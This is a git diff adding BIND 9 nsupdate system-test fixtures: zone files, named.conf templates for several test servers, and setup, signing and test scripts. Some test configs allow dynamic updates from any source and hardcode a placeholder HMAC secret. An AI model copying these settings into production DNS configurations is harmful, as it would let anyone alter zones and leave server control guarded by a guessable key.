b/bin/tests/system/nsupdate/ns3/multisigner.test.db.in new file mode 100644 index 0000000..7b4d91c --- /dev/null +++ b/bin/tests/system/nsupdate/ns3/multisigner.test.db.in @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +multisigner.test. 10 IN SOA multisigner.test. hostmaster.multisigner.test. 1 3600 900 2419200 3600 +multisigner.test. 10 IN NS multisigner.test. +multisigner.test. 10 IN A 10.53.0.3 diff --git a/bin/tests/system/nsupdate/ns3/named.conf.in b/bin/tests/system/nsupdate/ns3/named.conf.in new file mode 100644 index 0000000..f87048a --- /dev/null +++ b/bin/tests/system/nsupdate/ns3/named.conf.in @@ -0,0 +1,73 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS3 + +options { + query-source address 10.53.0.3 dscp 7; + notify-source 10.53.0.3 dscp 8; + transfer-source 10.53.0.3 dscp 9; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +zone "example" { + type primary; + allow-update { any; }; + file "example.db"; +}; + +zone "nsec3param.test" { + type primary; + allow-update { any; }; + file "nsec3param.test.db.signed"; +}; + +zone "dnskey.test" { + type primary; + allow-update { any; }; + file "dnskey.test.db.signed"; +}; + +zone "many.test" { + type secondary; + primaries { 10.53.0.1; }; + allow-update-forwarding { any; }; + file "many.test.bk"; +}; + +zone "delegation.test" { + type primary; + allow-update { any; }; + file "delegation.test.db.signed"; +}; + +zone "too-big.test" { + type primary; + allow-update { any; }; + max-records 3; + file "too-big.test.db"; +}; + +/* Zone for testing CDS and CDNSKEY updates from other provider */ +zone "multisigner.test" { + type primary; + allow-update { any; }; + dnssec-policy "default"; + file "multisigner.test.db"; +}; diff --git a/bin/tests/system/nsupdate/ns3/nsec3param.test.db.in b/bin/tests/system/nsupdate/ns3/nsec3param.test.db.in new file mode 100644 index 0000000..b26f5bd --- /dev/null +++ b/bin/tests/system/nsupdate/ns3/nsec3param.test.db.in @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 10 +nsec3param.test. IN SOA nsec3param.test. hostmaster.nsec3param.test. 1 3600 900 2419200 3600 +nsec3param.test. IN NS nsec3param.test. +nsec3param.test. IN A 10.53.0.3 diff --git a/bin/tests/system/nsupdate/ns3/sign.sh b/bin/tests/system/nsupdate/ns3/sign.sh new file mode 100644 index 0000000..c3db402 --- /dev/null +++ b/bin/tests/system/nsupdate/ns3/sign.sh @@ -0,0 +1,51 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=nsec3param.test. +infile=nsec3param.test.db.in +zonefile=nsec3param.test.db + +keyname1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +keyname2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) + +cat $infile $keyname1.key $keyname2.key >$zonefile + +$SIGNER -P -3 - -H 1 -o $zone -k $keyname1 $zonefile $keyname2 > /dev/null + +zone=dnskey.test. +infile=dnskey.test.db.in +zonefile=dnskey.test.db + +keyname1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone -f KSK $zone) +keyname2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) + +cat $infile $keyname1.key $keyname2.key >$zonefile + +$SIGNER -P -o $zone -k $keyname1 $zonefile $keyname2 > /dev/null + +zone=delegation.test. +infile=delegation.test.db.in +zonefile=delegation.test.db + +keyname1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -3 -f KSK $zone) +keyname2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -3 $zone) + +cat $infile $keyname1.key $keyname2.key >$zonefile + +$SIGNER -A -3 - -P -o $zone -k $keyname1 $zonefile $keyname2 > /dev/null + +# Just copy multisigner.db.in because it is signed with dnssec-policy. +cp multisigner.test.db.in multisigner.test.db diff --git a/bin/tests/system/nsupdate/ns3/too-big.test.db.in b/bin/tests/system/nsupdate/ns3/too-big.test.db.in new file mode 100644 index 0000000..45ee9ad --- /dev/null +++ b/bin/tests/system/nsupdate/ns3/too-big.test.db.in @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 10 +too-big.test. IN SOA too-big.test. hostmaster.too-big.test. 1 3600 900 2419200 3600 +too-big.test. IN NS too-big.test. +too-big.test. IN A 10.53.0.3 diff --git a/bin/tests/system/nsupdate/ns5/local.db.in b/bin/tests/system/nsupdate/ns5/local.db.in new file mode 100644 index 0000000..12a5d8b --- /dev/null +++ b/bin/tests/system/nsupdate/ns5/local.db.in @@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +local.nil IN SOA ns5.local.nil. hostmaster.local.nil. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +local.nil. NS ns5.local.nil. +ns5.local.nil. A 10.53.0.5 + +$ORIGIN local.nil. +a A 10.10.10.10 diff --git a/bin/tests/system/nsupdate/ns5/named.args b/bin/tests/system/nsupdate/ns5/named.args new file mode 100644 index 0000000..a1ebb6f --- /dev/null +++ b/bin/tests/system/nsupdate/ns5/named.args @@ -0,0 +1 @@ +-D nsupdate-ns5 -m record,size,mctx -c named.conf -d 99 -X named.lock -g -U 4 -T maxcachesize=2097152 -T fixedlocal diff --git a/bin/tests/system/nsupdate/ns5/named.conf.in b/bin/tests/system/nsupdate/ns5/named.conf.in new file mode 100644 index 0000000..c36777d --- /dev/null +++ b/bin/tests/system/nsupdate/ns5/named.conf.in @@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + session-keyfile "session.key"; + listen-on { 10.53.0.5; }; + recursion no; + notify yes; + minimal-responses no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "local.nil" { + type primary; + file "local.db"; + update-policy local; +}; diff --git a/bin/tests/system/nsupdate/ns6/in-addr.db.in b/bin/tests/system/nsupdate/ns6/in-addr.db.in new file mode 100644 index 0000000..9ac2b61 --- /dev/null +++ b/bin/tests/system/nsupdate/ns6/in-addr.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns5.local.nil. hostmaster.local.nil. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns5 +ns5 A 10.53.0.5 diff --git a/bin/tests/system/nsupdate/ns6/named.args b/bin/tests/system/nsupdate/ns6/named.args new file mode 100644 index 0000000..11e5449 --- /dev/null +++ b/bin/tests/system/nsupdate/ns6/named.args @@ -0,0 +1 @@ +-D nsupdate-ns6 -m record,size,mctx -c named.conf -d 99 -X named.lock -g -U 4 -T maxcachesize=2097152 -T fixedlocal diff --git a/bin/tests/system/nsupdate/ns6/named.conf.in b/bin/tests/system/nsupdate/ns6/named.conf.in new file mode 100644 index 0000000..a2bc409 --- /dev/null +++ b/bin/tests/system/nsupdate/ns6/named.conf.in @@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.6; + notify-source 10.53.0.6; + transfer-source 10.53.0.6; + port @PORT@; + pid-file "named.pid"; + session-keyfile "session.key"; + listen-on { 10.53.0.6; }; + recursion no; + notify yes; + minimal-responses no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "in-addr.arpa" { + type primary; + file "in-addr.db"; + update-policy { grant * tcp-self . PTR; }; +}; diff --git a/bin/tests/system/nsupdate/ns7/dns.keytab b/bin/tests/system/nsupdate/ns7/dns.keytab Binary files differnew file mode 100644 index 0000000..08d5ef4 --- /dev/null +++ b/bin/tests/system/nsupdate/ns7/dns.keytab diff --git a/bin/tests/system/nsupdate/ns7/example.com.db.in b/bin/tests/system/nsupdate/ns7/example.com.db.in new file mode 100644 index 0000000..34a0885 --- /dev/null +++ b/bin/tests/system/nsupdate/ns7/example.com.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns7.example.com. hostmaster.example.com. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns7 +ns7 A 10.53.0.7 diff --git a/bin/tests/system/nsupdate/ns7/in-addr.db.in b/bin/tests/system/nsupdate/ns7/in-addr.db.in new file mode 100644 index 0000000..34a0885 --- /dev/null +++ b/bin/tests/system/nsupdate/ns7/in-addr.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns7.example.com. hostmaster.example.com. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns7 +ns7 A 10.53.0.7 diff --git a/bin/tests/system/nsupdate/ns7/machine.ccache b/bin/tests/system/nsupdate/ns7/machine.ccache Binary files differnew file mode 100644 index 0000000..7dcd959 --- /dev/null +++ b/bin/tests/system/nsupdate/ns7/machine.ccache diff --git a/bin/tests/system/nsupdate/ns7/named.conf.in b/bin/tests/system/nsupdate/ns7/named.conf.in new file mode 100644 index 0000000..9d28bf5 --- /dev/null +++ b/bin/tests/system/nsupdate/ns7/named.conf.in @@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.7; + notify-source 10.53.0.7; + transfer-source 10.53.0.7; + port @PORT@; + pid-file "named.pid"; + session-keyfile "session.key"; + listen-on { 10.53.0.7; }; + recursion no; + notify yes; + minimal-responses no; + tkey-gssapi-keytab "dns.keytab"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "in-addr.arpa" { + type primary; + file "in-addr.db"; + update-policy { grant EXAMPLE.COM krb5-subdomain . PTR; }; +}; + +zone "example.com" { + type primary; + file "example.com.db"; + update-policy { + grant EXAMPLE.COM krb5-self . ANY; + grant EXAMPLE.COM krb5-subdomain _tcp.example.com SRV; + }; +}; diff --git a/bin/tests/system/nsupdate/ns8/dns-other-than-KRB5_KTNAME.keytab b/bin/tests/system/nsupdate/ns8/dns-other-than-KRB5_KTNAME.keytab Binary files differnew file mode 100644 index 0000000..3340049 --- /dev/null +++ b/bin/tests/system/nsupdate/ns8/dns-other-than-KRB5_KTNAME.keytab diff --git a/bin/tests/system/nsupdate/ns8/example.com.db.in b/bin/tests/system/nsupdate/ns8/example.com.db.in new file mode 100644 index 0000000..f83a3eb --- /dev/null +++ b/bin/tests/system/nsupdate/ns8/example.com.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns8.example.com. hostmaster.example.com. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns8 +ns8 A 10.53.0.8 diff --git a/bin/tests/system/nsupdate/ns8/in-addr.db.in b/bin/tests/system/nsupdate/ns8/in-addr.db.in new file mode 100644 index 0000000..f83a3eb --- /dev/null +++ b/bin/tests/system/nsupdate/ns8/in-addr.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns8.example.com. hostmaster.example.com. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns8 +ns8 A 10.53.0.8 diff --git a/bin/tests/system/nsupdate/ns8/machine.ccache b/bin/tests/system/nsupdate/ns8/machine.ccache Binary files differnew file mode 100644 index 0000000..6e75aff --- /dev/null +++ b/bin/tests/system/nsupdate/ns8/machine.ccache diff --git a/bin/tests/system/nsupdate/ns8/named.conf.in b/bin/tests/system/nsupdate/ns8/named.conf.in new file mode 100644 index 0000000..ead3cfe --- /dev/null +++ b/bin/tests/system/nsupdate/ns8/named.conf.in @@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.8; + notify-source 10.53.0.8; + transfer-source 10.53.0.8; + port @PORT@; + pid-file "named.pid"; + session-keyfile "session.key"; + listen-on { 10.53.0.8; }; + recursion no; + notify yes; + minimal-responses no; + tkey-gssapi-keytab "dns-other-than-KRB5_KTNAME.keytab"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.8 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "in-addr.arpa" { + type primary; + file "in-addr.db"; + update-policy { grant EXAMPLE.COM krb5-subdomain . PTR; }; +}; + +zone "example.com" { + type primary; + file "example.com.db"; + update-policy { + grant EXAMPLE.COM krb5-selfsub . ANY; + grant EXAMPLE.COM krb5-subdomain _tcp.example.com SRV; + }; +}; diff --git a/bin/tests/system/nsupdate/ns9/dns.keytab b/bin/tests/system/nsupdate/ns9/dns.keytab Binary files differnew file mode 100644 index 0000000..470317f --- /dev/null +++ b/bin/tests/system/nsupdate/ns9/dns.keytab diff --git a/bin/tests/system/nsupdate/ns9/example.com.db.in b/bin/tests/system/nsupdate/ns9/example.com.db.in new file mode 100644 index 0000000..cb3fae5 --- /dev/null +++ b/bin/tests/system/nsupdate/ns9/example.com.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns9.example.com. hostmaster.example.com. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns9 +ns9 A 10.53.0.9 diff --git a/bin/tests/system/nsupdate/ns9/in-addr.db.in b/bin/tests/system/nsupdate/ns9/in-addr.db.in new file mode 100644 index 0000000..cb3fae5 --- /dev/null +++ b/bin/tests/system/nsupdate/ns9/in-addr.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns9.example.com. hostmaster.example.com. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns9 +ns9 A 10.53.0.9 diff --git a/bin/tests/system/nsupdate/ns9/machine.ccache b/bin/tests/system/nsupdate/ns9/machine.ccache Binary files differnew file mode 100644 index 0000000..2b59cec --- /dev/null +++ b/bin/tests/system/nsupdate/ns9/machine.ccache diff --git a/bin/tests/system/nsupdate/ns9/named.conf.in b/bin/tests/system/nsupdate/ns9/named.conf.in new file mode 100644 index 0000000..5115b15 --- /dev/null +++ b/bin/tests/system/nsupdate/ns9/named.conf.in @@ -0,0 +1,64 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.9; + notify-source 10.53.0.9; + transfer-source 10.53.0.9; + port @PORT@; + pid-file "named.pid"; + session-keyfile "session.key"; + listen-on { 10.53.0.9; }; + recursion no; + notify yes; + minimal-responses no; + @TKEY_CONFIGURATION@ +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +key subkey { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.9 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "in-addr.arpa" { + type primary; + file "in-addr.db"; + update-policy { grant EXAMPLE.COM ms-subdomain . PTR; }; +}; + +zone "example.com" { + type primary; + file "example.com.db"; + update-policy { + grant EXAMPLE.COM ms-self . ANY; + grant EXAMPLE.COM ms-subdomain _tcp.example.com SRV; + }; +}; + +zone "denyname.example" { + type master; + file "denyname.example.db"; + update-policy { + deny subkey name denyname.example; + grant subkey subdomain denyname.example; + }; +}; diff --git a/bin/tests/system/nsupdate/prereq.sh b/bin/tests/system/nsupdate/prereq.sh new file mode 100644 index 0000000..1079c7e --- /dev/null +++ b/bin/tests/system/nsupdate/prereq.sh @@ -0,0 +1,28 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if $PERL -e 'use Net::DNS;' 2>/dev/null +then + if $PERL -e 'use Net::DNS; die if ($Net::DNS::VERSION >= 0.69 && $Net::DNS::VERSION <= 0.70);' 2>/dev/null + then + : + else + echo_i "Net::DNS versions 0.69 to 0.70 have bugs that cause this test to fail: please update." >&2 + exit 1 + fi +fi + +exit 0 diff --git a/bin/tests/system/nsupdate/setup.sh b/bin/tests/system/nsupdate/setup.sh new file mode 100644 index 0000000..fac39d4 --- /dev/null +++ b/bin/tests/system/nsupdate/setup.sh @@ -0,0 +1,106 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +# +# jnl and database files MUST be removed before we start +# +$SHELL clean.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns5/named.conf.in ns5/named.conf +copy_setports ns6/named.conf.in ns6/named.conf +copy_setports ns7/named.conf.in ns7/named.conf +copy_setports ns8/named.conf.in ns8/named.conf + +# If "tkey-gssapi-credential" is set in the configuration and GSSAPI support is +# not available, named will refuse to start. As the test system framework does +# not support starting named instances conditionally, ensure that +# "tkey-gssapi-credential" is only present in named.conf if GSSAPI support is +# available. +copy_setports ns9/named.conf.in ns9/named.conf.in.tkey +copy_setports ns10/named.conf.in ns10/named.conf.in.tkey +if $FEATURETEST --gssapi; then + sed 's|@TKEY_CONFIGURATION@|tkey-gssapi-credential "DNS/ns9.example.com@EXAMPLE.COM";|' ns9/named.conf.in.tkey > ns9/named.conf + sed 's|@TKEY_CONFIGURATION@|tkey-gssapi-credential "DNS/ns10.example.com@EXAMPLE.COM";|' ns10/named.conf.in.tkey > ns10/named.conf +else + sed 's|@TKEY_CONFIGURATION@||' ns9/named.conf.in.tkey > ns9/named.conf + sed 's|@TKEY_CONFIGURATION@||' ns10/named.conf.in.tkey > ns10/named.conf +fi +rm -f ns9/named.conf.in.tkey +rm -f ns10/named.conf.in.tkey + +copy_setports verylarge.in verylarge + +cp -f ns1/example1.db ns1/example.db +sed 's/example.nil/other.nil/g' ns1/example1.db > ns1/other.db +sed 's/example.nil/unixtime.nil/g' ns1/example1.db > ns1/unixtime.db +sed 's/example.nil/yyyymmddvv.nil/g' ns1/example1.db > ns1/yyyymmddvv.db +sed 's/example.nil/keytests.nil/g' ns1/example1.db > ns1/keytests.db +cp -f ns3/example.db.in ns3/example.db +cp -f ns3/too-big.test.db.in ns3/too-big.test.db + +# update_test.pl has its own zone file because it +# requires a specific NS record set. +cat <<\EOF >ns1/update.db +$ORIGIN . +$TTL 300 ; 5 minutes +update.nil IN SOA ns1.example.nil. hostmaster.example.nil. ( + 1 ; serial + 2000 ; refresh (2000 seconds) + 2000 ; retry (2000 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +update.nil. NS ns1.update.nil. +ns1.update.nil. A 10.53.0.2 +ns2.update.nil. AAAA ::1 +EOF + +$DDNSCONFGEN -q -z example.nil > ns1/ddns.key + +if $FEATURETEST --md5; then + $DDNSCONFGEN -q -a hmac-md5 -k md5-key -z keytests.nil > ns1/md5.key +else + echo -n > ns1/md5.key +fi +$DDNSCONFGEN -q -a hmac-sha1 -k sha1-key -z keytests.nil > ns1/sha1.key +$DDNSCONFGEN -q -a hmac-sha224 -k sha224-key -z keytests.nil > ns1/sha224.key +$DDNSCONFGEN -q -a hmac-sha256 -k sha256-key -z keytests.nil > ns1/sha256.key +$DDNSCONFGEN -q -a hmac-sha384 -k sha384-key -z keytests.nil > ns1/sha384.key +$DDNSCONFGEN -q -a hmac-sha512 -k sha512-key -z keytests.nil > ns1/sha512.key + +(cd ns3; $SHELL -e sign.sh) + +cp -f ns1/many.test.db.in ns1/many.test.db + +cp ns1/sample.db.in ns1/sample.db +cp ns2/sample.db.in ns2/sample.db + +cp -f ns1/maxjournal.db.in ns1/maxjournal.db + +cp -f ns5/local.db.in ns5/local.db +cp -f ns6/in-addr.db.in ns6/in-addr.db +cp -f ns7/in-addr.db.in ns7/in-addr.db +cp -f ns7/example.com.db.in ns7/example.com.db +cp -f ns8/in-addr.db.in ns8/in-addr.db +cp -f ns8/example.com.db.in ns8/example.com.db +cp -f ns9/in-addr.db.in ns9/in-addr.db +cp -f ns9/example.com.db.in ns9/example.com.db +cp -f ns9/example.com.db.in ns9/denyname.example.db +cp -f ns10/in-addr.db.in ns10/in-addr.db +cp -f ns10/example.com.db.in ns10/example.com.db diff --git a/bin/tests/system/nsupdate/tests.sh b/bin/tests/system/nsupdate/tests.sh new file mode 100755 index 0000000..2cf23ac --- /dev/null +++ b/bin/tests/system/nsupdate/tests.sh @@ -0,0 +1,1552 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +# +# Uncomment when creating credential cache files. +# +# KRB5_CONFIG="$(pwd)/krb/krb5.conf" +# +# Cd krb and run krb/setup.sh to create new keys. +# Run nsupdate system test. +# Kill the krb5kdc server started by krb/setup.sh. +# Check the expiry date on the cached machine.ccache with klist is in 2038. +# Comment out KRB5_CONFIG. +# Re-run nsupdate system test to confirm everything still works. +# git add and commit the resulting ns*/machine.ccache and ns*/dns.keytab files. +# Clean up krb. +# + +status=0 +n=0 + +nextpartreset ns3/named.run + +# wait for zone transfer to complete +tries=0 +while true; do + if [ $tries -eq 10 ] + then + exit 1 + fi + + if grep "example.nil/IN.*Transfer status" ns2/named.run > /dev/null + then + break + else + echo_i "zones are not fully loaded, waiting..." + tries=$((tries + 1)) + sleep 1 + fi +done + +has_positive_response() { + zone=$1 + type=$2 + ns=$3 + $DIG $DIGOPTS +tcp +norec $zone $type @$ns > dig.out.post.test$n || return 1 + grep "status: NOERROR" dig.out.post.test$n > /dev/null || return 1 + grep "ANSWER: 0," dig.out.post.test$n > /dev/null && return 1 + return 0 +} + +ret=0 +echo_i "fetching first copy of zone before update" +$DIG $DIGOPTS +tcp +noadd +nosea +nostat +noquest +nocomm +nocmd example.nil.\ + @10.53.0.1 axfr > dig.out.ns1 || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + 